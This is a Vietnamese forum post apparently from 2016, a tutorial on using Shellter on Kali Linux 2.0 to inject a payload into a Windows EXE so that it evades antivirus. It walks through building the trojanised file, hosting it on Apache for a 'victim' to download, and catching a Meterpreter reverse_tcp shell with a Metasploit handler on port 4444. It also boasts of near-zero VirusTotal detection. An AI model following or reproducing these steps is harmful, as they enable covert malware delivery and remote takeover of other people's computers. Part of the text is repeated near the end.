bamboo76114
W-------
-
01/03/2016
-
9
-
7 bài viết
Bypass Anti-Virus với Shellter trên Kali linux 2.0
Giới thiệu Trên Phiên bản Kali Linux 1.0 chúng ta đã biết tới Veil-Evasion, một công cụ để Bypass AV khá mạnh với nhiều Payload tuy nhiên gần đây có một số Payload đã bị AV nhận diện được và một điều nữa là việc tải và cài đặt Veil-Evasion khá lâu. Sang phiên bản Kali 2.0, Shellter sẽ là một sự lựa chọn mới dành cho Pentester. Được ban hành trong năm 2015, cho đến hiện tại Shellter vẫn có thể bypass hầu hết các AV với tính năng mã hóa và giải mã đa hình, tỷ lệ bị phát hiện trên Virustotal là rất thấp thậm chí là không có.
Cách cài đặt và sử dụng
Tại cửa sổ Terminal: apt-get install shellter --> shellter sau đó click Install để bắt đầu cài đặt.
Bước tiếp ta nhập 'A' để chọn chế độ Auto, M để tự tùy chỉnh và H để được hướng dẫn.
Sau khi nhập 'A' ta nhập tên file thực thi dạng EXE, file này phải được đặt cùng thư mục chạy Shellter, trong trường hợp này là /root/
Tiếp theo là chọn Payload. Đầu tiên ta nhập "L" để sử dụng danh sách Payload có ở trên sau đó nhập số thứ tự của Payload cần dùng rồi IP của Kali và cuối cùng là cổng kết nối ( mình chọn 4444 ).
Cuối cùng ta ấn Enter để kết thúc.
Sau khi tiêm mã độc vào file xong, ta copy vào thư mục /var/www/html/ rồi nhập service apache2 start để victim có thể truy cập và tải về file virus.
Ta vào sẵn Metasploit: use multi/handler --> set payload windows/meterpreter/reverse_tcp --> set lhost 'IP của Kali' --> 4444 --> exploit
Trên máy victim tải về và mở file virus.
Kali đã kết nối được tới máy Victim, giờ ta có thể làm nhiều việc đối với máy victim thông qua dòng lệnh.
Đây là kết quả test trên Virustotal.com
Video Demo
[video=youtube;_t_zPG0dJYI]https://www.youtube.com/watch?v=_t_zPG0dJYI[/video]
Cách cài đặt và sử dụng
Tại cửa sổ Terminal: apt-get install shellter --> shellter sau đó click Install để bắt đầu cài đặt.
[video=youtube;_t_zPG0dJYI]https://www.youtube.com/watch?v=_t_zPG0dJYI[/video]
